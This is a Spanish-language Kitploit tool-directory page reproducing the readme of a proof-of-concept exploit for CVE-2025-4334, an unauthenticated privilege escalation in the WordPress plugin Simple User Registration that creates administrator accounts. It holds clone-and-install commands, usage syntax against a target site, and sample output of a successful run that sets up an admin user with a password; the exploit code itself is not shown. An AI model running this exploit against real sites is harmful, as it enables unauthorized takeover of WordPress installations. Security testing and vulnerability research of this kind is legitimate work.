Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4334 — Exploit de prueba de concepto para CVE-2025-4334, una vulnerabilidad de escalada de privilegios en el plugin de WordPress Simple User Registration (<= 6.3), que permite a atacantes no autenticados crear cuentas de administrador. | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub0xgh057r3c0n/cve-2025-4334

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-4334

Exploit de prueba de concepto para CVE-2025-4334, una vulnerabilidad de escalada de privilegios en el plugin de WordPress Simple User Registration (<= 6.3), que permite a atacantes no autenticados crear cuentas de administrador.

Ver Repositorio
41hace 11 mesesAún no revisado

Logotipo de WordPress

CVE-2025-4334 - Simple User Registration <= 6.3 – Escalada de Privilegios no Autenticada

Título del Exploit: Simple User Registration <= 6.3 – Escalada de Privilegios no Autenticada Autor: Gaurav Bhattacharjee (0xgh057r3c0n) ID de CVE: CVE-2025-4334

Este exploit apunta a una vulnerabilidad en el plugin Simple User Registration para WordPress (<= v6.3), permitiendo a atacantes no autenticados escalar privilegios y crear una nueva cuenta de administrador.


⚙️ Instalación

Clona el repositorio e instala las dependencias de Python requeridas:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Dependencias:

  • requests
  • colorama

🚀 Uso

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Argumentos:

  • -u / --url → URL base de WordPress (ej. https://target.com/wordpress/)
  • --form → URL completa del formulario de registro (ej. https://target.com/wpr/default-registration/)

Ejemplo:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Salida de Ejemplo

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Descargo de Responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de investigación. El uso no autorizado contra sistemas sin permiso es ilegal. El autor no asume ninguna responsabilidad por el mal uso.


📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT.

Descargar herramienta